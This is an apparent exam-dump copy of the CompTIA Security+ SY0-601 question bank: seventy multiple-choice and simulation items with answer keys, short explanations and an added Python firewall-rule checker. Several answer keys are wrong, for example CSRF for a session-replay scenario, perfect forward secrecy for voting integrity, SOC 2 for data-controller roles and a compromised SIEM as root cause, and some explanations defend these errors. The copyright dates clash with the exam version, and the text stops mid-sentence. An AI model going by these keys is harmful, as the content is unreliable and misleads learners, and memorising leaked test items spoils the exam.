
SY0-601

Copyright © 2006-2011 Lead2pass.com , All Rights Reserved.
Vendor: CompTIA
Exam Code: SY0-601
Exam Name: CompTIA Security+ Certification Exam
Version: 23.101
Important Notice
Product
Our Product Manager keeps an eye out for exam updates by vendors. Free updates are available within
150 days after your purchase.
You can log in to the member center and download the latest product at any time. (Products downloaded
from the member center are always the latest.)
PS: To ensure you can pass the exam, please check for the latest product again 2-3 days before the
exam.
Feedback
We are devoted to improving product quality and the grade of service to ensure customers' interests.
If you have any suggestions, please feel free to contact us at support@lead2pass.com.
If you have any questions about our product, please provide the Exam Number, Version, Page
Number, Question Number, and your Login Account, and contact us at
technology@lead2pass.com; our technical experts will provide support within 24 hours.
Copyright
The product of each order has its own encryption code, so you should use it independently.
If anyone shares the file, we will disable their free updates and account access.
Any unauthorized changes will be subject to legal punishment. We reserve the right of final
explanation for this statement.
QUESTION 1
An organization is developing an authentication service for use at the entry and exit ports of
country borders. The service will use data feeds obtained from passport systems, passenger
manifests, and high-definition video feeds from CCTV systems that are located at the ports. The
service will incorporate machine-learning techniques to eliminate biometric enrollment processes
while still allowing authorities to identify passengers with increasing accuracy over time. The more
frequently passengers travel, the more accurately the service will identify them.
Which of the following biometrics will MOST likely be used, without the need for enrollment?
(Choose two.)
A. Voice
B. Gait
C. Vein
D. Facial
E. Retina
F. Fingerprint
Answer: BD
QUESTION 2
A small company that does not have security staff wants to improve its security posture. Which of
the following would BEST assist the company?
A. MSSP
B. SOAR
C. IaaS
D. PaaS
Answer: A
Explanation:
The company doesn't have IT staff, so if they want security they need an MSSP (Managed
Security Service Provider).
Managed Security Services Provider (MSSP) - a means of fully outsourcing responsibility for
information assurance to a third party. This type of solution is expensive but can be a good fit for
an SME that has experienced rapid growth and has no in-house security capability. Of course,
this type of outsourcing places a huge amount of trust in the MSSP. Maintaining effective
oversight of the MSSP requires a good degree of internal security awareness and expertise.
There could also be significant challenges in industries exposed to high degrees of regulation in
terms of information processing.
A SOAR (Security Orchestration, Automation, and Response) would improve your security, but
it's more oriented to the automation of an existing incident response plan. If you're thinking of
implementing a SOAR, you are likely to already have a SOC (Security Operations Center), which is,
in a way, IT staff.
QUESTION 3
An organization's help desk is flooded with phone calls from users stating they can no longer
access certain websites. The help desk escalates the issue to the security team, as these
websites were accessible the previous day. The security analysts run the following command:
ipconfig /flushdns, but the issue persists. Finally, an analyst changes the DNS server for an
impacted machine, and the issue goes away. Which of the following attacks MOST likely
occurred on the original DNS server?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
2
A. DNS cache poisoning
B. Domain hijacking
C. Distributed denial-of-service
D. DNS tunneling
Answer: B
QUESTION 4
A cybersecurity manager has scheduled biannual meetings with the IT team and department
leaders to discuss how they would respond to hypothetical cyberattacks. During these meetings,
the manager presents a scenario and injects additional information throughout the session to
replicate what might occur in a dynamic cybersecurity event involving the company, its facilities,
its data, and its staff. Which of the following describes what the manager is doing?
A. Developing an incident response plan
B. Building a disaster recovery plan
C. Conducting a tabletop exercise
D. Running a simulation exercise
Answer: C
QUESTION 5
A RAT that was used to compromise an organization's banking credentials was found on a user's
computer. The RAT evaded antivirus detection. It was installed by a user who has local
administrator rights to the system as part of a remote management tool set. Which of the
following recommendations would BEST prevent this from reoccurring?
A. Create a new acceptable use policy.
B. Segment the network into trusted and untrusted zones.
C. Enforce application whitelisting.
D. Implement DLP at the network boundary.
Answer: C
QUESTION 6
A security analyst is reviewing a new website that will soon be made publicly available. The
analyst sees the following in the URL:
http://dev-site.comptia.org/home/show.php?sessionID=77276554&loc=us
The analyst then sends an internal user a link to the new website for testing purposes, and when
the user clicks the link, the analyst is able to browse the website with the following URL:
http://dev-site.comptia.org/home/show.php?sessionID=98988475&loc=us
Which of the following application attacks is being tested?
A. Pass-the-hash
B. Session replay
C. Object dereference
D. Cross-site request forgery
Answer: D
QUESTION 7
A network administrator has been asked to install an IDS to improve the security posture of an
organization. Which of the following control types is an IDS?
A. Corrective
B. Physical
C. Detective
D. Administrative
Answer: C
QUESTION 8
Which of the following should be put in place when negotiating with a new vendor about the
timeliness of the response to a significant outage or incident?
A. MOU
B. MTTR
C. SLA
D. NDA
Answer: C
QUESTION 9
A startup company is using multiple SaaS and IaaS platforms to stand up a corporate
infrastructure and build out a customer-facing web application. Which of the following solutions
would be BEST to provide security, manageability, and visibility into the platforms?
A. SIEM
B. DLP
C. CASB
D. SWG
Answer: C
Explanation:
A cloud access security broker (CASB) is on-premises or cloud-based software that sits between cloud
service users and cloud applications, monitors all activity, and enforces security policies. A
CASB has a separate and more distinctive role. Unlike the use case for an SWG, which
focuses on broader filtering and protection against inbound threats and filtering of illegitimate
web traffic, a CASB is more deeply integrated and has control over your cloud application usage.
It can be tied into an application's API to scan data at rest, or it can be used with a proxy-based
deployment to enforce inline policies for more real-time protection.
QUESTION 10
A root cause analysis reveals that a web application outage was caused by one of the company's
developers uploading a newer version of the third-party libraries that were shared among several
applications. Which of the following implementations would be BEST to prevent the issue from
reoccurring?
A. CASB
B. SWG
C. Containerization
D. Automated failover
Answer: C
Explanation:
Containerization is defined as a form of operating system virtualization, through which
applications are run in isolated user spaces called containers, all using the same shared
operating system (OS).
QUESTION 11
A security administrator suspects there may be unnecessary services running on a server. Which
of the following tools will the administrator MOST likely use to confirm the suspicions?
A. Nmap
B. Wireshark
C. Autopsy
D. DNSEnum
Answer: A
Explanation:
Nmap, or Network Mapper, is a network scanning and security auditing tool that is commonly
used to discover and map network resources, such as servers and devices, and to identify the
services running on those resources. It can be used to scan a single host or a range of hosts to
determine which ports are open and which services are running on those ports. This information
can be used to identify services that may be unnecessary or potentially insecure, and to take
appropriate action to mitigate any security risks. In this case, the administrator can use Nmap to
scan the server and confirm whether there are any unnecessary services running on it.
QUESTION 12
A company has drafted an insider-threat policy that prohibits the use of external storage devices.
Which of the following would BEST protect the company from data exfiltration via removable
media?
A. Monitoring large data transfer transactions in the firewall logs
B. Developing mandatory training to educate employees about the removable media policy
C. Implementing a group policy to block user access to system files
D. Blocking removable-media devices and write capabilities using a host-based security tool
Answer: D
QUESTION 13
In which of the following common use cases would steganography be employed?
A. Obfuscation
B. Integrity
C. Non-repudiation
D. Blockchain
Answer: A
QUESTION 14
To secure an application after a large data breach, an e-commerce site will be resetting all users'
credentials. Which of the following will BEST ensure the site's users are not compromised after
the reset?
A. A password reuse policy
B. Account lockout after three failed attempts
C. Encrypted credentials in transit
D. A geofencing policy based on login history
Answer: C
QUESTION 15
In which of the following risk management strategies would cybersecurity insurance be used?
A. Transference
B. Avoidance
C. Acceptance
D. Mitigation
Answer: A
QUESTION 16
An organization has implemented a policy requiring the use of conductive metal lockboxes for
personal electronic devices outside of a secure research lab. Which of the following did the
organization determine to be the GREATEST risk to intellectual property when creating this
policy?
A. The theft of portable electronic devices
B. Geotagging in the metadata of images
C. Bluesnarfing of mobile devices
D. Data exfiltration over a mobile hotspot
Answer: D
QUESTION 17
A security analyst is using a recently released security advisory to review historical logs, looking
for the specific activity that was outlined in the advisory. Which of the following is the analyst
doing?
A. A packet capture
B. A user behavior analysis
C. Threat hunting
D. Credentialed vulnerability scanning
Answer: C
QUESTION 18
Which of the following would MOST likely support the integrity of a voting machine?
A. Asymmetric encryption
B. Blockchain
C. Transport Layer Security
D. Perfect forward secrecy
Answer: D
QUESTION 19
A Chief Information Security Officer (CISO) needs to create a policy set that meets international
standards for data privacy and sharing. Which of the following should the CISO read and
understand before writing the policies?
A. PCI DSS
B. GDPR
C. NIST
D. ISO 31000
Answer: B
QUESTION 20
The IT department at a university is concerned about professors placing servers on the university
network in an attempt to bypass security controls. Which of the following BEST represents this
type of threat?
A. A script kiddie
B. Shadow IT
C. Hacktivism
D. White-hat
Answer: B
Explanation:
Shadow IT is the use of information technology systems, devices, software, applications, and
services without explicit IT department approval.
QUESTION 21
A commercial cyber-threat intelligence organization observes IoCs across a variety of unrelated
customers. Prior to releasing specific threat intelligence to other paid subscribers, the
organization is MOST likely obligated by contracts to:
A. perform attribution to specific APTs and nation-state actors.
B. anonymize any PII that is observed within the IoC data.
C. add metadata to track the utilization of threat intelligence reports.
D. assist companies with impact assessments based on the observed data.
Answer: B
QUESTION 22
While checking logs, a security engineer notices a number of end users suddenly downloading
files with the .tar.gz extension. Closer examination of the files reveals they are PE32 files. The
end users state they did not initiate any of the downloads. Further investigation reveals the end
users all clicked on an external email containing an infected MHT file with an href link a week
prior. Which of the following is MOST likely occurring?
A. A RAT was installed and is transferring additional exploit tools.
B. The workstations are beaconing to a command-and-control server.
C. A logic bomb was executed and is responsible for the data transfers.
D. A fileless virus is spreading in the local network environment.
Answer: A
Explanation:
RATs are typically downloaded together with a seemingly legitimate program, like a game, or are
sent to the target as an email attachment. Once the attacker compromises the host's system,
they can use it to distribute RATs to additional vulnerable computers, establishing a botnet.
QUESTION 23
An organization is developing a plan in the event of a complete loss of critical systems and data.
Which of the following plans is the organization MOST likely developing?
A. Incident response
B. Communications
C. Disaster recovery
D. Data retention
Answer: C
QUESTION 24
Which of the following is the purpose of a risk register?
A. To define the level of risk using probability and likelihood
B. To register the risk with the required regulatory agencies
C. To identify the risk, the risk owner, and the risk measures
D. To formally log the type of risk mitigation strategy the organization is using
Answer: C
Explanation:
The risk register displays a list of all recorded risks along with various risk details, including
the residual risk level, risk source, risk owner, risk stage, and the treatment status of the risk.
The question asks for the purpose, so C is the purpose, while A is only one part of the work a risk
register supports.
QUESTION 25
A university with remote campuses, which all use different service providers, loses Internet
connectivity across all locations. After a few minutes, Internet and VoIP services are restored,
only to go offline again at random intervals, typically within four minutes of services being
restored. Outages continue throughout the day, impacting all inbound and outbound connections
and services. Services that are limited to the local LAN or WiFi network are not impacted, but all
WAN and VoIP services are affected.
Later that day, the edge-router manufacturer releases a CVE outlining the ability of an attacker to
exploit the SIP protocol handling on devices, leading to resource exhaustion and system reloads.
Which of the following BEST describe this type of attack? (Choose two.)
A. DoS
B. SSL stripping
C. Memory leak
D. Race condition
E. Shimming
F. Refactoring
Answer: AD
QUESTION 26
A company recently set up an e-commerce portal to sell its product online. The company wants to
start accepting credit cards for payment, which requires compliance with a security standard.
Which of the following standards must the company comply with before accepting credit cards on
its e-commerce platform?
A. PCI DSS
B. ISO 22301
C. ISO 27001
D. NIST CSF
Answer: A
Explanation:
Many organizations must also abide by certain standards. For example, organizations
handling credit card information need to comply with the Payment Card Industry Data Security
Standard (PCI DSS). PCI DSS includes six control objectives and 12 specific requirements that
help prevent fraud.
QUESTION 27
Which of the following BEST describes a security exploit for which a vendor patch is not readily
available?
A. Integer overflow
B. Zero-day
C. End of life
D. Race condition
Answer: B
QUESTION 28
The Chief Financial Officer (CFO) of an insurance company received an email from Ann, the
company's Chief Executive Officer (CEO), requesting a transfer of $10,000 to an account. The
email states Ann is on vacation and has lost her purse, containing cash and credit cards. Which
of the following social-engineering techniques is the attacker using?
A. Phishing
B. Whaling
C. Typo squatting
D. Pharming
Answer: B
QUESTION 29
An organization wants to implement a third factor to an existing multifactor authentication. The
organization already uses a smart card and password. Which of the following would meet the
organization's needs for a third factor?
A. Date of birth
B. Fingerprints
C. PIN
D. TPM
Answer: B
QUESTION 30
An employee has been charged with fraud and is suspected of using corporate assets. As
authorities collect evidence, and to preserve the admissibility of the evidence, which of the
following forensic techniques should be used?
A. Order of volatility
B. Data recovery
C. Chain of custody
D. Non-repudiation
Answer: C
QUESTION 31
A company wants to deploy PKI on its Internet-facing website. The applications that are currently
deployed are:
- www.company.com (main website)
- contactus.company.com (for locating a nearby location)
- quotes.company.com (for requesting a price quote)
The company wants to purchase one SSL certificate that will work for all the existing applications
and any future applications that follow the same naming conventions, such as
store.company.com. Which of the following certificate types would BEST meet the requirements?
A. SAN
B. Wildcard
C. Extended validation
D. Self-signed
Answer: B
QUESTION 32
A Chief Security Officer (CSO) is concerned about the amount of PII that is stored locally on each
salesperson's laptop. The sales department has a higher-than-average rate of lost equipment.
Which of the following recommendations would BEST address the CSO's concern?
A. Deploy an MDM solution.
B. Implement managed FDE.
C. Replace all hard drives with SEDs.
D. Install DLP agents on each laptop.
Answer: B
QUESTION 33
A user contacts the help desk to report the following:
- Two days ago, a pop-up browser window prompted the user for a name and password after
  connecting to the corporate wireless SSID. This had never happened before, but the user
  entered the information as requested.
- The user was able to access the Internet but had trouble accessing the department share
  until the next day.
- The user is now getting notifications from the bank about unauthorized transactions.
Which of the following attack vectors was MOST likely used in this scenario?
A. Rogue access point
B. Evil twin
C. DNS poisoning
D. ARP poisoning
Answer: B
QUESTION 34
A host was infected with malware. During the incident response, Joe, a user, reported that he did
not receive any emails with links, but he had been browsing the Internet all day. Which of the
following would MOST likely show where the malware originated?
A. The DNS logs
B. The web server logs
C. The SIP traffic logs
D. The SNMP logs
Answer: A
Explanation:
Why is DNS monitoring important? An effective system of DNS monitoring is critical to the
reliability of your website, as well as the security and trust of your users. Because DNS is a
popular target for attackers, it's important to keep a close eye out for any malicious activity against
your domains and services.
QUESTION 35
A recently discovered zero-day exploit utilizes an unknown vulnerability in the SMB network
protocol to rapidly infect computers. Once infected, computers are encrypted and held for
ransom. Which of the following would BEST prevent this attack from reoccurring?
A. Configure the perimeter firewall to deny inbound external connections to SMB ports.
B. Ensure endpoint detection and response systems are alerting on suspicious SMB connections.
C. Deny unauthenticated users access to shared network folders.
D. Verify computers are set to install monthly operating system updates automatically.
Answer: A
QUESTION 36
Joe, an employee, receives an email stating he won the lottery. The email includes a link that
requests a name, mobile phone number, address, and date of birth be provided to confirm Joe's
identity before sending him the prize. Which of the following BEST describes this type of email?
A. Spear phishing
B. Whaling
C. Phishing
D. Vishing
Answer: C
Explanation:
"The email includes a link that requests a name, mobile phone number, address, and date of
birth" is far too vague for this to be spear phishing.
If it were spear phishing, the attacker would already know his name, and Joe would only need to
fill out his mobile phone number, address, and date of birth.
QUESTION 37
Which of the following refers to applications and systems that are used within an organization
without consent or approval?
A. Shadow IT
B. OSINT
C. Dark web
D. Insider threats
Answer: A
QUESTION 38
A manufacturer creates designs for very high security products that are required to be protected
and controlled by the government regulations. These designs are not accessible by corporate
networks or the Internet. Which of the following is the BEST solution to protect these designs?
A. An air gap
B. A Faraday cage
C. A shielded cable
D. A demilitarized zone
Answer: A
QUESTION 39
A company processes highly sensitive data and senior management wants to protect the
sensitive data by utilizing classification labels. Which of the following access control schemes
would be BEST for the company to implement?
A. Discretionary
B. Rule-based
C. Role-based
D. Mandatory
Answer: D
QUESTION 40
Which of the following policies would help an organization identify and mitigate potential single
points of failure in the company's IT/security operations?
A. Least privilege
B. Awareness training
C. Separation of duties
D. Mandatory vacation
Answer: C
QUESTION 41
Which of the following would be the BEST method for creating a detailed diagram of wireless
access points and hotspots?
A. Footprinting
B. White-box testing
C. A drone/UAV
D. Pivoting
Answer: A
QUESTION 42
SIMULATION
A company recently added a DR site and is redesigning the network. Users at the DR site are
having issues browsing websites.
INSTRUCTIONS
Click on each firewall to do the following:
1. Deny cleartext web traffic.
2. Ensure secure management protocols are used.
3. Resolve issues at the DR site.
The ruleset order cannot be modified due to outside constraints.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Answer:
Firewall 1:
10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.0.1/24 - SSH - PERMIT
ANY - 10.0.0.1/24 - HTTPS - PERMIT
ANY - 10.0.0.1/24 - HTTP - DENY
Firewall 2:
10.0.1.1/24 - ANY - DNS - PERMIT
10.0.1.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.1.1/24 - SSH - PERMIT
ANY - 10.0.1.1/24 - HTTPS - PERMIT
ANY - 10.0.1.1/24 - HTTP - DENY
Firewall 3:
192.168.0.1/24 - ANY - DNS - PERMIT
192.168.0.1/24 - ANY - HTTPS - PERMIT
ANY - 192.168.0.1/24 - SSH - PERMIT
ANY - 192.168.0.1/24 - HTTPS - PERMIT
ANY - 192.168.0.1/24 - HTTP - DENY
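The following is an added example, not part of the exam material: a small first-match rule evaluator that loads the three rulesets above and checks each firewall against the simulation's requirements (cleartext web denied, secure management permitted, DNS and HTTPS browsing allowed out). It assumes first-match-wins evaluation with an implicit deny at the end of each ruleset, and uses constructed sample hosts from documentation address ranges; neither is stated by the simulation.

```python
import ipaddress
from dataclasses import dataclass

# Service names as used in the simulation answer (port numbers for reference only).
SERVICE_PORTS = {"DNS": 53, "HTTP": 80, "HTTPS": 443, "SSH": 22}


@dataclass(frozen=True)
class Rule:
    src: str      # CIDR (host-style such as 10.0.0.1/24 accepted) or "ANY"
    dst: str
    service: str  # key in SERVICE_PORTS
    action: str   # "PERMIT" or "DENY"


def parse_rule(line: str) -> Rule:
    """Parse one 'SRC - DST - SERVICE - ACTION' line exactly as written in the answer."""
    src, dst, service, action = [field.strip() for field in line.split(" - ")]
    if service not in SERVICE_PORTS or action not in ("PERMIT", "DENY"):
        raise ValueError(f"unrecognised rule: {line!r}")
    return Rule(src, dst, service, action)


# Rulesets copied from the simulation answer above.
RULESET_TEXT = {
    "Firewall 1": """10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.0.1/24 - SSH - PERMIT
ANY - 10.0.0.1/24 - HTTPS - PERMIT
ANY - 10.0.0.1/24 - HTTP - DENY""",
    "Firewall 2": """10.0.1.1/24 - ANY - DNS - PERMIT
10.0.1.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.1.1/24 - SSH - PERMIT
ANY - 10.0.1.1/24 - HTTPS - PERMIT
ANY - 10.0.1.1/24 - HTTP - DENY""",
    "Firewall 3": """192.168.0.1/24 - ANY - DNS - PERMIT
192.168.0.1/24 - ANY - HTTPS - PERMIT
ANY - 192.168.0.1/24 - SSH - PERMIT
ANY - 192.168.0.1/24 - HTTPS - PERMIT
ANY - 192.168.0.1/24 - HTTP - DENY""",
}
RULESETS = {name: [parse_rule(l) for l in text.splitlines()] for name, text in RULESET_TEXT.items()}

# Constructed sample hosts (assumption): one inside each protected network, one on the Internet.
INSIDE_HOST = {"Firewall 1": "10.0.0.25", "Firewall 2": "10.0.1.25", "Firewall 3": "192.168.0.40"}
OUTSIDE_HOST = "198.51.100.7"


def _matches(pattern: str, address: str) -> bool:
    if pattern == "ANY":
        return True
    # strict=False lets host-style notation like 10.0.0.1/24 denote its /24 network.
    return ipaddress.ip_address(address) in ipaddress.ip_network(pattern, strict=False)


def evaluate(rules, src: str, dst: str, service: str) -> str:
    """First matching rule wins; anything unmatched is denied (assumed implicit deny)."""
    for rule in rules:
        if rule.service == service and _matches(rule.src, src) and _matches(rule.dst, dst):
            return rule.action
    return "DENY"


def check_firewall(rules, inside: str, outside: str) -> dict:
    """Map each of the three simulation requirements to whether the ruleset meets it."""
    out = lambda svc: evaluate(rules, inside, outside, svc)   # inside -> Internet
    inb = lambda svc: evaluate(rules, outside, inside, svc)   # Internet -> inside
    return {
        "cleartext web denied": inb("HTTP") == "DENY" and out("HTTP") == "DENY",
        "secure management permitted": inb("SSH") == "PERMIT",
        "browsing works": out("DNS") == "PERMIT" and out("HTTPS") == "PERMIT",
    }


def audit() -> dict:
    """Run the requirement checks against every firewall in the answer."""
    return {name: check_firewall(rules, INSIDE_HOST[name], OUTSIDE_HOST)
            for name, rules in RULESETS.items()}


if __name__ == "__main__":
    for name, result in audit().items():
        print(name, result)
```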
QUESTION 43
Drag and Drop Question
A security engineer is setting up passwordless authentication for the first time.
INSTRUCTIONS
Use the minimum set of commands to set this up and verify that it works. Commands cannot be
reused.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Answer:
Explanation:
1. ssh-keygen -t rsa (create the key pair)
2. ssh-copy-id -i ~/.ssh/id_rsa.pub user@server (copy the public key to user@server)
3. ssh -i ~/.ssh/id_rsa user@server (log in to the remote host with the private key)
QUESTION 44
Hotspot Question
Select the appropriate attack and remediation from each drop-down list to label the corresponding
attack with its remediation.
INSTRUCTIONS
Not all attacks and remediation actions will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Answer:
QUESTION 45
Which of the following will MOST likely adversely impact the operations of unpatched traditional
programmable-logic controllers, running a back-end LAMP server and OT systems with human-management
interfaces that are accessible over the Internet via a web interface? (Choose two.)
A. Cross-site scripting
B. Data exfiltration
C. Poor system logging
D. Weak encryption
E. SQL injection
F. Server-side request forgery
Answer: DF
QUESTION 46
A company recently transitioned to a strictly BYOD culture due to the cost of replacing lost or
damaged corporate-owned mobile devices. Which of the following technologies would be BEST
to balance the BYOD culture while also protecting the company's data?
A. Containerization
B. Geofencing
C. Full-disk encryption
D. Remote wipe
Answer: A
Explanation:
You cannot run full-disk encryption on a staff member's personal device. Instead, you place the official
application in a container.
QUESTION 47
A Chief Security Officer's (CSO's) key priorities are to improve preparation, response, and
recovery practices to minimize system downtime and enhance organizational resilience to
ransomware attacks. Which of the following would BEST meet the CSO's objectives?
A. Use email-filtering software and centralized account management, patch high-risk systems, and
restrict administration privileges on fileshares.
B. Purchase cyber insurance from a reputable provider to reduce expenses during an incident.
C. Invest in end-user awareness training to change the long-term culture and behavior of staff and
executives, reducing the organization's susceptibility to phishing attacks.
D. Implement application whitelisting and centralized event-log management, and perform regular
testing and validation of full backups.
Answer: D
QUESTION 48
A network engineer has been asked to investigate why several wireless barcode scanners and
wireless computers in a warehouse have intermittent connectivity to the shipping server. The
barcode scanners and computers are all on forklift trucks and move around the warehouse during
their regular use. Which of the following should the engineer do to determine the issue? (Choose
two.)
A. Perform a site survey
B. Deploy an FTK Imager
C. Create a heat map
D. Scan for rogue access points
E. Upgrade the security protocols
F. Install a captive portal
Answer: AC
QUESTION 49
A security administrator suspects an employee has been emailing proprietary information to a
competitor. Company policy requires the administrator to capture an exact copy of the
employee's hard disk. Which of the following should the administrator use?
A. dd
B. chmod
C. dnsenum
D. logger
Answer: A
QUESTION 50
Which of the following is MOST likely to outline the roles and responsibilities of data controllers
and data processors?
A. SSAE SOC 2
B. PCI DSS
C. GDPR
D. ISO 31000
Answer: A
Explanation:
SSAE stands for Statement on Standards for Attestation Engagements. This AICPA-developed auditing
report assesses how well organizations handle data security, system privacy, data confidentiality, and
data processing.
QUESTION 51
Phishing and spear-phishing attacks have been occurring more frequently against a company's
staff. Which of the following would MOST likely help mitigate this issue?
A. DNSSEC and DMARC
B. DNS query logging
C. Exact mail exchanger records in the DNS
D. The addition of DNS conditional forwarders
Answer: C
QUESTION 52
On which of the following is the live acquisition of data for forensic analysis MOST dependent?
(Choose two.)
A. Data accessibility
B. Legal hold
C. Cryptographic or hash algorithm
D. Data retention legislation
E. Value and volatility of data
F. Right-to-audit clauses
Answer: EF
QUESTION 53
Which of the following incident response steps involves actions to protect critical systems while
maintaining business operations?
A. Investigation
B. Containment
C. Recovery
D. Lessons learned
Answer: B
QUESTION 54
A security auditor is reviewing vulnerability scan data provided by an internal security team.
Which of the following BEST indicates that valid credentials were used?
A. The scan results show open ports, protocols, and services exposed on the target host
B. The scan enumerated software versions of installed programs
C. The scan produced a list of vulnerabilities on the target host
D. The scan identified expired SSL certificates
Answer: B
QUESTION 55
Which of the following BEST explains the difference between a data owner and a data custodian?
A. The data owner is responsible for adhering to the rules for using the data, while the data
custodian is responsible for determining the corporate governance regarding the data
B. The data owner is responsible for determining how the data may be used, while the data
custodian is responsible for implementing the protection to the data
C. The data owner is responsible for controlling the data, while the data custodian is responsible for
maintaining the chain of custody when handling the data
D. The data owner grants the technical permissions for data access, while the data custodian
maintains the database access controls to the data
Answer: B
QUESTION 56
A network engineer needs to build a solution that will allow guests at the company's headquarters
to access the Internet via WiFi. This solution should not allow access to the internal corporate
network, but it should require guests to sign off on the acceptable use policy before accessing the
Internet. Which of the following should the engineer employ to meet these requirements?
A. Implement open PSK on the APs
B. Deploy a WAF
C. Configure WIPS on the APs
D. Install a captive portal
Answer: D
QUESTION 57
An organization with a low tolerance for user inconvenience wants to protect laptop hard drives
against loss or data theft. Which of the following would be the MOST acceptable?
A. SED
B. HSM
C. DLP
D. TPM
Answer: A
Explanation:
An SED (self-encrypting drive) is the most acceptable option for an organization with a low
tolerance for user inconvenience that wants to protect laptop hard drives against loss or theft.
The encryption is built into the drive's controller and runs transparently: data is encrypted at
rest without any extra steps from the user beyond normal logon (or a pre-boot password where one
is configured), so a stolen laptop yields only ciphertext. HSM and TPM are key-storage
components rather than drive-encryption products on their own, and DLP controls where data may
travel rather than protecting a drive that has left the building.
QUESTION 58
A security analyst receives a SIEM alert that someone logged in to the appadmin test account,
which is only used for the early detection of attacks. The security analyst then reviews the
following application log:
Which of the following can the security analyst conclude?
A. A replay attack is being conducted against the application.
B. An injection attack is being conducted against a user authentication system.
C. A service account password may have been changed, resulting in continuous failed logins within
the application.
D. A credentialed vulnerability scanner attack is testing several CVEs against the application.
Answer: B
QUESTION 59
In which of the following situations would it be BEST to use a detective control type for mitigation?
A. A company implemented a network load balancer to ensure 99.999% availability of its web
application.
B. A company designed a backup solution to increase the chances of restoring services in case of a
natural disaster.
C. A company purchased an application-level firewall to isolate traffic between the accounting
department and the information technology department.
D. A company purchased an IPS system, but after reviewing the requirements, the appliance was
supposed to monitor, not block, any traffic.
E. A company purchased liability insurance for flood protection on all capital assets.
Answer: D
QUESTION 60
The IT department's on-site developer has been with the team for many years. Each time an
application is released, the security team is able to identify multiple vulnerabilities. Which of the
following would BEST help the team ensure the application is ready to be released to production?
A. Limit the use of third-party libraries.
B. Prevent data exposure queries.
C. Obfuscate the source code.
D. Submit the application to QA before releasing it.
Answer: D
QUESTION 61
A cybersecurity analyst needs to implement secure authentication to third-party websites without
users' passwords. Which of the following would be the BEST way to achieve this objective?
A. OAuth
B. SSO
C. SAML
D. PAP
Answer: C
QUESTION 62
An analyst needs to identify the applications a user was running and the files that were open
before the user's computer was shut off by holding down the power button.
Which of the following would MOST likely contain that information?
A. NGFW
B. Pagefile
C. NetFlow
D. RAM
Answer: B
Explanation:
A hard shutdown (holding the power button or pulling the plug) loses everything in RAM, but the
pagefile on disk survives and can retain fragments of process memory, executable names, and the
paths of files that were open. That is why an investigator who suspects the pagefile holds
evidence will sometimes pull the plug rather than shut the machine down cleanly: an orderly
shutdown gives the OS a chance to overwrite the pagefile, and Windows wipes it entirely if the
ClearPageFileAtShutdown policy is enabled. RAM (D) would be the better source only if the
machine were still running.
https://www.iosrjournals.org/iosr-jce/papers/Vol16-issue2/Version-5/C016251116.pdf
QUESTION 63
A remote user recently took a two-week vacation abroad and brought along a corporate-owned
laptop. Upon returning to work, the user has been unable to connect the laptop to the VPN.
Which of the following is the MOST likely reason for the user's inability to connect the laptop to
the VPN?
A. Due to foreign travel, the user's laptop was isolated from the network.
B. The user's laptop was quarantined because it missed the latest patch update.
C. The VPN client was blacklisted.
D. The user's account was put on a legal hold.
Answer: A
QUESTION 64
An organization needs to implement more stringent controls over administrator/root credentials
and service accounts. Requirements for the project include:
- Check-in/checkout of credentials
- The ability to use but not know the password
- Automated password changes
- Logging of access to credentials
Which of the following solutions would meet the requirements?
A. OAuth 2.0
B. Secure Enclave
C. A privileged access management system
D. An OpenID Connect authentication system
Answer: C
QUESTION 65
Several employees return to work the day after attending an industry trade show. That same day,
the security manager notices several malware alerts coming from each of the employee's
workstations. The security manager investigates but finds no signs of an attack on the perimeter
firewall or the NIDS. Which of the following is MOST likely causing the malware alerts?
A. A worm that has propagated itself across the intranet, which was initiated by presentation media
B. A fileless virus that is contained on a vCard that is attempting to execute an attack
C. A Trojan that has passed through and executed malicious code on the hosts
D. A USB flash drive that is trying to run malicious code but is being blocked by the host firewall
Answer: A
QUESTION 66
After reading a security bulletin, a network security manager is concerned that a malicious actor
may have breached the network using the same software flaw. The exploit code is publicly
available and has been reported as being used against other industries in the same vertical.
Which of the following should the network security manager consult FIRST to determine a priority
list for forensic review?
A. The vulnerability scan output
B. The IDS logs
C. The full packet capture data
D. The SIEM alerts
Answer: A
QUESTION 67
A financial organization has adopted a new secure, encrypted document-sharing application to
help with its customer loan process. Some important PII needs to be shared across this new
platform, but it is getting blocked by the DLP systems. Which of the following actions will BEST
allow the PII to be shared with the secure application without compromising the organization's
security posture?
A. Configure the DLP policies to allow all PII
B. Configure the firewall to allow all ports that are used by this application
C. Configure the antivirus software to allow the application
D. Configure the DLP policies to whitelist this application with the specific PII
E. Configure the application to encrypt the PII
Answer: D
QUESTION 68
An auditor is performing an assessment of a security appliance with an embedded OS that was
vulnerable during the last two assessments. Which of the following BEST explains the appliance's
vulnerable state?
A. The system was configured with weak default security settings.
B. The device uses weak encryption ciphers.
C. The vendor has not supplied a patch for the appliance.
D. The appliance requires administrative credentials for the assessment.
Answer: C
QUESTION 69
A company’s bank has reported that multiple corporate credit cards have been stolen over the
past several weeks. The bank has provided the names of the affected cardholders to the
company’s forensics team to assist in the cyber-incident investigation.
An incident responder learns the following information:
- The timeline of stolen card numbers corresponds closely with affected users making
Internet-based purchases from diverse websites via enterprise desktop PCs.
- All purchase connections were encrypted, and the company uses an SSL inspection proxy for the
inspection of encrypted traffic of the hardwired network.
- Purchases made with corporate cards over the corporate guest WiFi network, where no SSL
inspection occurs, were unaffected.
Which of the following is the MOST likely root cause?
A. HTTPS sessions are being downgraded to insecure cipher suites
B. The SSL inspection proxy is feeding events to a compromised SIEM
C. The payment providers are insecurely processing credit card charges
D. The adversary has not yet established a presence on the guest WiFi network
Answer: B
QUESTION 70
A security analyst has been asked to investigate a situation after the SOC started to receive
alerts from the SIEM. The analyst first looks at the domain controller and finds the following
events:
To better understand what is going on, the analyst runs a command and receives the following
output:
Based on the analyst’s findings, which of the following attacks is being executed?
A. Credential harvesting
B. Keylogger
C. Brute-force
D. Spraying
Answer: D
Explanation:
Password spraying is a variant of brute force. Instead of trying many passwords against one
